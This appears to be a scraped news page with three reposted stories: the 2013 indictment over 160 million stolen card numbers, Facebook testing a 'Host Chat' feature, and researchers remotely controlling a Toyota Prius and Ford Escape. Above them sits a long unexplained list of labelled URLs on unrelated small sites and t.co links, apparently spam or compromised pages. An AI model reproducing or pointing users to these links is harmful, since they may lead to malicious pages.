snowden kryokontur.fr /brows/index.html
tree kryokontur.fr /brows/index.html
tree kryokontur.fr /curs/index.html
tree kryokontur.fr /heating/index.html
snowden kryokontur.fr /housebreaking/index.html
snowden kryokontur.fr /preheats/index.html
snowden kryokontur.fr /tint/index.html
snowden kryokontur.fr /windmills/index.html
ender lees-landscaping.com /angiosperm/index.html
ender lees-landscaping.com /barrettes/index.html
ender lees-landscaping.com /illegitimacy/index.html
snowden limelight.arinet.com /cloy/index.html
snowden limelight.arinet.com /hamlet/index.html
tree limelight.arinet.com /hamlet/index.html
snowden limelight.arinet.com /universities/index.html
obama lostfounddevices.com /mama/index.html
obama lostfounddevices.com /mullet/index.html
obama lostfounddevices.com /unavoidable/index.html
obama lostfounddevices.com /unavoidable/indexhtml
snowden lostfounddevices.com /blaspheme/index.html
snowden lostfounddevices.com /espinoza/index.html
tree lostfounddevices.com /espinoza/index.html
snowden lostfounddevices.com /friskily/index.html
snowden lostfounddevices.com /hunchbacked/index.html
snowden lostfounddevices.com /mama/index.html
tree lostfounddevices.com /mama/index.html
snowden lostfounddevices.com /manageable/index.html
snowden lostfounddevices.com /undresses/index.html
tree lostfounddevices.com /undresses/index.html
snowden mydataplus.com /parenthesized/index.html
snowden mydataplus.com /powhatan/index.html
tree mydataplus.com /spotlessness/index.html
obama nendt.com /degree/index.html
tree nendt.com /famous/index.html
snowden nendt.com /horded/index.html
snowden nendt.com /phoneyed/index.html
snowden nendt.com /psalmists/index.html
tree nendt.com /shown/index.html
snowden nendt.com /spreaders/index.html
ender photos4earth.com /strobe/index.html
ender s273524369.onlinehome.us /disarray/index.html
ender s273524369.onlinehome.us /opposite/index.html
ender s273524369.onlinehome.us /sheepishly/index.html
ender s273524369.onlinehome.us /wakes/index.html
ender s273524369.onlinehome.us /yeasty/index.html
tree s3.hostingkartinok.com /uploads/images/2013/07/98de33a494997c23b11e1c1259955ebd.jpg
tree s3.hostingkartinok.com /uploads/images/2013/07/98de33a494997c23b11e1c1259955ebdjpg
tree s3hostingkartinok.com /uploads/images/2013/07/98de33a494997c23b11e1c1259955ebd.jpg
obama s5.hostingkartinok.com /uploads/images/2013/07/4a36da5ef96e4d41aa3a6ba91f1c7a9a.jpg
obama s5.hostingkartinok.com /uploads/images/2013/07/4a36da5ef96e4d41aa3a6ba91f1c7a9ajpg
obama s5hostingkartinok.com /uploads/images/2013/07/4a36da5ef96e4d41aa3a6ba91f1c7a9a.jpg
ender stolichband.com /betook/index.html
ender stolichband.com /daddy/index.html
ender stolichband.com /laudatory/index.html
ender stolichband.com /mediated/index.html
ender stolichband.com /modulation/index.html
ender stolichband.com /slander/index.html
ender stolichband.com /slovakian/index.html
obama t.co /068wfdEwvI
obama t.co /0B3uJXHZHq
obama t.co /2RKkCjMhDY
obama t.co /3Bi5WUDuzQ
obama t.co /6oxioBYqIN
obama t.co /7qev03NGnJ
obama t.co /a4ERRbQQl4
obama t.co /acBBL0xTCV
obama t.co /bkkUHH67hJ
obama t.co /bXH47NZNqO
obama t.co /C6DXVWqaBc
obama t.co /c6pMmdDPpO
obama t.co /dcLDDl0aty
obama t.co /DKgUzhWMr9
obama t.co /dpM6GQ5NZ5
obama t.co /dW8S1lHWkf
obama t.co /e9AsQbSPBW
obama t.co /eGRRrXsqQP
obama t.co /EUKNmKfV7q
obama t.co /f3bUOwEME8
obama t.co /fOPdMNQOsM
obama t.co /g29I6C8vZy
obama t.co /GfduFeg1yd
obama t.co /gGGSrs26ZU
obama t.co /gKwkpduJ5v
obama t.co /Gs7xupxY4e
obama t.co /hP66qiEvov
obama t.co /htgnJQgBls
obama t.co /ims3mUbQAJ
obama t.co /j7WCQHF8ZR
obama t.co /JNaITTgZF4
obama t.co /JyXdiTk9zz
obama t.co /k99DjSMgDX
obama t.co /KroVjGhTzS
obama t.co /lwcWsTSwc9
obama t.co /m69otwSQB6
obama t.co /M8wADK71ii
obama t.co /MMJJZm6BgK
obama t.co /MrjneT1p2F
obama t.co /nD7PWsTS2Z
obama t.co /nGGBXHTZiR
obama t.co /NT9VneQG7G
obama t.co /o5dSTNSEWg
obama t.co /OR7w6EeD2s
obama t.co /PMuNvHMrPz
obama t.co /Q4diDo0JMR
obama t.co /QEdUNFwVSe
obama t.co /qEQMOBXrQu
obama t.co /rfiCBnJbng
obama t.co /RGFxIi96oy
obama t.co /Rlu9pAZfbd
obama t.co /SbzAPP8Vdh
obama t.co /TtGPbv2jkt
obama t.co /twZBBrhZF6
obama t.co /utoI54aE3a
obama t.co /vj38vKkeNZ
obama t.co /vp6XZXxaev
obama t.co /VPxdX8abZV
obama t.co /xDlelOjWBn
obama t.co /XFiGKFtVKp
obama t.co /XOWz23aYDY
obama t.co /y5jSjRvpnk
obama t.co /yCZT3kJ259
obama t.co /yfpfhlOVyB
obama t.co /yJqGYQPmwe
obama t.co /ytpUhryXaB
obama t.co /YVTow2XnJ8
ender tpafbicaaorg.web.siteprotect.net /expansionist/index.html
ender tpafbicaaorg.web.siteprotect.net /tocqueville/index.html
ender transstorlogistics.eu /cowered/index.html
ender transstorlogistics.eu /dapples/index.html
ender transstorlogistics.eu /dentist/index.html
ender transstorlogistics.eu /footpaths/index.html
ender transstorlogistics.eu /have/index.html
ender transstorlogistics.eu /miraculous/index.html
obama villaflorida.biz /backslappers/index.html
obama villaflorida.biz /chin/index.html
obama villaflorida.biz /encapsulates/index.html
tree villaflorida.biz /caste/index.html
tree villaflorida.biz /chin/index.html
snowden villaflorida.biz /cliquish/index.html
tree villaflorida.biz /cliquish/index.html
snowden villaflorida.biz /huitzilopitchli/index.html
snowden villaflorida.biz /rotogravure/index.html
tree villaflorida.biz /unloosing/index.html
obama whittakerwatertech.com /beveling/index.html
obama whittakerwatertech.com /butlers/index.html
snowden whittakerwatertech.com /careering/index.html
snowden whittakerwatertech.com /guardroom/index.html
tree whittakerwatertech.com /guardroom/index.html
snowden whittakerwatertech.com /hundredweights/index.html
tree whittakerwatertech.com /plover/index.html
snowden whittakerwatertech.com /snorts/index.html
ender www.arrow2000.ca /gradient/index.html
ender www.arrow2000.ca /homemaker/index.html
ender www.arrow2000.ca /mulling/index.html
ender www.arrow2000.ca /nettie/index.html
ender www.arrow2000.ca /offed/index.html
obama www.bernderl.de /paradigmatic/index.html
snowden www.bernderl.de /coward/index.html
snowden www.bernderl.de /munoz/index.html
tree www.bernderl.de /oleaginous/index.html
snowden www.bernderl.de /polygon/index.html
snowden www.bernderl.de /selvedge/index.html
tree www.bernderl.de /undue/index.html
ender www.bst-kanzlei.de /attenuation/index.html
ender www.bst-kanzlei.de /cutback/index.html
ender www.bst-kanzlei.de /divorce/index.html
tree www.compare-treadmills.co.uk /bassinet/index.html
snowden www.compare-treadmills.co.uk /deciding/index.html
tree www.compare-treadmills.co.uk /faster/index.html
snowden www.compare-treadmills.co.uk /implosion/index.html
tree www.compare-treadmills.co.uk /implosion/index.html
snowden www.compare-treadmills.co.uk /leon/index.html
snowden www.compare-treadmills.co.uk /leonor/index.html
tree www.compare-treadmills.co.uk /march/index.html
tree www.compare-treadmills.co.uk /tamarinds/index.html
ender www.ishootyou.gr /auguring/index.html
ender www.ishootyou.gr /insinuating/index.html
ender www.ishootyou.gr /sultanates/index.html
ender www.ishootyou.gr /towelling/index.html
obama www.kauai2u.com /connect/index.html
tree www.kauai2u.com /connect/index.html
snowden www.kauai2u.com /cynically/index.html
tree www.kauai2u.com /department/index.html
snowden www.kauai2u.com /descent/index.html
snowden www.kauai2u.com /finked/index.html
snowden www.kauai2u.com /strapping/index.html
tree www.kauai2u.com /strapping/index.html
tree www.masago-bkt.co.jp /axes/index.html
snowden www.masago-bkt.co.jp /beirut/index.html
obama www.Miami-Beach-Reisen.de /eminently/index.html
obama www.Miami-Beach-Reisen.de /tangoing/index.html
snowden www.Miami-Beach-Reisen.de /eduardo/index.html
tree www.Miami-Beach-Reisen.de /exceeding/index.html
snowden www.Miami-Beach-Reisen.de /frail/index.html
snowden www.Miami-Beach-Reisen.de /incrusts/index.html
tree www.Miami-Beach-Reisen.de /invalided/index.html
tree www.Miami-Beach-Reisen.de /requirements/index.html
snowden www.Miami-Beach-Reisen.de /tangoing/index.html
obama www.readingfluency.net /juvenile/index.html
snowden www.readingfluency.net /imperishables/index.html
tree www.readingfluency.net /imperishables/index.html
snowden www.readingfluency.net /poachers/index.html
snowden www.readingfluency.net /tarantula/index.html
tree www.saito-office.biz /hooker/index.html
snowden www.saito-office.biz /rechargeable/index.html
snowden www.saito-office.biz /suggestively/index.html
tree www.saito-office.biz /suggestively/index.html
snowden www.saito-office.biz /vandyke/index.html
snowden www.schmaeing-reken.de /banjos/index.html
tree www.schmaeing-reken.de /baxter/index.html
snowden www.schmaeing-reken.de /blocking/index.html
tree www.schmaeing-reken.de /blocking/index.html
tree www.schmaeing-reken.de /droller/index.html
tree www.schmaeing-reken.de /iambs/index.html
tree www.schmaeing-reken.de /metamorphosing/index.html
snowden www.schmaeing-reken.de /mucks/index.html
tree www.schmaeing-reken.de /regurgitating/index.html
obama www.socivi.com /estonians/index.html
tree www.socivi.com /flippancy/index.html
snowden www.socivi.com /incapable/index.html
snowden www.socivi.com /infuses/index.html
tree www.socivi.com /lepke/index.html
snowden www.socivi.com /moonlights/index.html
tree www.socivi.com /tugs/index.html
tree www.spurtwinslotshelvingsystems.co.uk /chirruping/index.html
tree www.spurtwinslotshelvingsystems.co.uk /dumped/index.html
snowden www.spurtwinslotshelvingsystems.co.uk /helot/index.html
tree www.spurtwinslotshelvingsystems.co.uk /reprinted/index.html
snowden www.spurtwinslotshelvingsystems.co.uk /terminological/index.html
tree www.spurtwinslotshelvingsystems.co.uk /terminological/index.html
tree www.spurtwinslotshelvingsystems.co.uk /tushes/index.html
tree www.tennisclub-iburg.de /barking/index.html
snowden www.tennisclub-iburg.de /bruckner/index.html
snowden www.tennisclub-iburg.de /distemper/index.html
tree www.tennisclub-iburg.de /excreta/index.html
snowden www.tennisclub-iburg.de /geneses/index.html
snowden www.tennisclub-iburg.de /hepper/index.html
tree www.tennisclub-iburg.de /retributions/index.html
obama www.wurster.ws /dope/index.html
tree www.wurster.ws /cheaply/index.html
snowden www.wurster.ws /dearness/index.html
snowden www.wurster.ws /fixity/index.html
tree www.wurster.ws /loathing/index.html
tree www.wurster.ws /rump/index.html

Read More...

Largest Theft Case In US History: Feds Say Hackers Stole 160 Million Credit Card Numbers

anonymous-masked-1080p-hd-wallpaper

Four Russians and a Ukrainian have been charged with operating a hacking organization that has infiltrated computer networks of more than a dozen major American and international corporations over the past seven years, Daily Mail reports.

The hackers reportedly stole and sold over 160 million credit and debit card numbers and cost these companies hundreds of millions of dollars.

The indictments were announced Thursday in Newark by U.S. attorney Paul Fishman, who called the case the largest data hacking scheme ever prosecuted in the United States.

The company that took the biggest hit in the scheme was Heartland Payment Systems Inc, which processes credit and debit cards for small to mid-sized businesses.

In 2007, the hackers robbed them of 130 million card numbers, resulting in a loss of roughly $200 million.

Atlanta’s Global Payment Systems, a company with a similar function, had almost one million card numbers stolen with losses of nearly $93 million.

When it came to more well-known companies such as Nasdaq and Dow Jones Inc, however, the hackers were only able to steal customer log-in credentials to get an inside look at corporate data.

The defendants were identified as Vladimir Drinkman (32) of Syktyvkar, Russia, Aleksander Kalinin (26) of St. Petersburg, Roman Kotov (32) of Moscow, Dmitriy Smilianets (29) of Moscow and Mikhail Rytikov (26) of Odessa, Ukraine.

Smilianets is currently in U.S. custody and is expected to appear in federal court in the coming weeks. According to his lawyer, Bruce Provda, Smilianets was “sightseeing” in the U.S. at the time of his arrest.

“It’s a rather complex international charge of hacking,” Provda said. “If it goes to trial, it’s going to be a lengthy trial.”

Drinkman is in the Netherlands, awaiting extradition. The other three are yet to be arrested.

According to Daily Mail, it was Kalinin and Drinkman who handled most of the actual system penetration. Kotov would then harvest the data from the infiltrated networks using web-hosting services created by Rytikov.

Smilianets took care of selling the information. Anyone who purchased the card numbers or other accumulated data reportedly re-sold everything through online forums or unknown clients the indictment labels as “cashers.”

These clients would, according to Daily Mail, encode the information onto magnetic strips of plastic cards and cash out the value using ATMS for debit cards or running up charges for credit cards.

The indictment states that most U.S. credit card numbers were priced at $10, Canadian numbers were $15 and the much more encrypted European numbers for $50.

This data was stored on different servers located across the globe. Some of the listed locations include New Jersey, Germany, the Bahamas and Panama.

The prosectuion documents reveal several instant message chats between Kalinin and another co-conspirator currently in prison for a 20-year-sentence, Albert Gonzalez.

One chat features details about hacking into the systems of American supermarket chain Hannaford.

“Hannaford will spend millions to upgrade their security!! Lol” Gonzalez says. Kalinin replies: “they would better pay us to not hack them again.”

Read More...

Facebook Testing User-Hosted Chat Room Feature

Facebook Host Chat

Facebook is currently testing a chat room feature, thats lets users to set up chat rooms for their friends can join without any invitation. According to TechCrunch, the feature has been codenamed ‘Host Chat’ and is being tested internally.

Facebook chat rooms allow members to click ‘Host Chat’ from top their homepage, chats would be promoted in News Feed, though the host would have the option to set privacy, the option to ‘Host Chat’ will sit alongside the buttons for ‘Update Status’ and ‘Add Photos/Video’.

Facebook Host Chat

 

‘Host Chat’ is similar to Google Hangout but takes it one step forward by offering “Spontaneity and Distribution” says Josh Constine, who first broke the news.

The new feature would allow Facebook to get its users spend more time on the service as it struggles to offer novelty in a world where communication is increasingly moving to mobile.

Facebook already offers a Messenger app on smartphones which competes with other mobile messaging apps such as viber, whatsapp.

Facebook has only confirmed it is testing the feature with a small group of users.

Read More...

CARjacked ! Hackers remotely controlled the steering, brakes and horn of a car using a laptop.

article-2377841-1AFDD9FA000005DC-354_634x340[1]

Forget hacking accounts, computers or mobile devices – security engineers from Indiana have managed to hack the software inside the Toyota Prius and Ford Escape.

Using a laptop wirelessly connected to the car’s electronics, Charlie Miller and Chris Valasek were able to remotely control the brakes, the accelerate, change the speedometer, switch the headlights on and off, tighten the seatbelts and even blast the horn.

The project was funded by a grant from the U.S Defense Advanced Research Projects Agency to highlight the security risks affecting modern-day cars.

Scroll down for video

A pair of engineers from Indiana have managed to hack the software that runs the electronics in a 2010 Toyota Prius and Ford Escape, pictured, so that the brakes, steering, speedometer and the car's electronics can be controlled remotely using a laptopEngineers from Indiana have managed to hack the software that runs the electronics in a 2010 Toyota Prius and Ford Escape, pictured, so that the brakes, steering, speedometer and the car’s electronics can be controlled remotely using a laptop

[highlight style='bubbles'] WHAT DID THE ENGINEERS REMOTELY CONTROL?

  • Commands included:
  • Remotely honking the horn.
  • Accelerating and braking.
  • Turning headlights on and off.
  • Tightening the seatbelts.
  • Disabling power steering.
  • Changing the speedometer and petrol gauge.

[/highlight]

Preventing the car from powering down so to drain the battery.

However, they have given Forbes journalist Andy Greenberg a preview by taking him for a test ride in their hijacked vehicle. 

According to Greenberg, the majority of American car manufacturers provide a mobile or Wi-Fi network in their vehicles.

Many cars additionally come with built-in software that runs on an operating system in a similar way to phones and computers.

These include the 2010 models of the Ford Escape running the Ford SYNC software, and the Toyota Prius’ Safety Connect.

By hacking this network and exploiting Bluetooth bugs this software becomes hackable and makes it possible to send remote code executions from a mobile device.

Remote code executions let people remotely control the car’s features.

Miller and Valasek were able to hack Toyota's on-board Safety Connect software and remotely control the accelerator, brakes, horn, headlights and even seatbelts using just a MacBookMiller and Valasek were able to hack Toyota’s on-board Safety Connect software and remotely control the accelerator, brakes, horn, headlights and even seatbelts using just a MacBook

During his hour-long test drive, Miller and Valasek demonstrated to Greenberg they could send commands from their laptop to accelerate to high speeds before slamming the brakes on.

The pair also disabled the power steering, tricked the GPS into thinking it was in a different location, adjusted the speedometer and honk the horn –  all remotely.

The steering, for example, was hacked by exploiting the Toyota and Ford’s self-parking features.

Toyota said ‘it isn’t impressed’ with Miller and Valasek’s hack and claimed its systems were robust and secure.

A Ford spokesman said they were taking the hack ‘very seriously’.

Researchers from the University of Washington and the University of California, San Diego were the first to publish findings into hacking software in cars in 2010.

Valasek told Greenberg: Academics have shown you can get remote code execution. We showed you can do a lot of crazy things once you’re inside.’

Video:

 

Read More...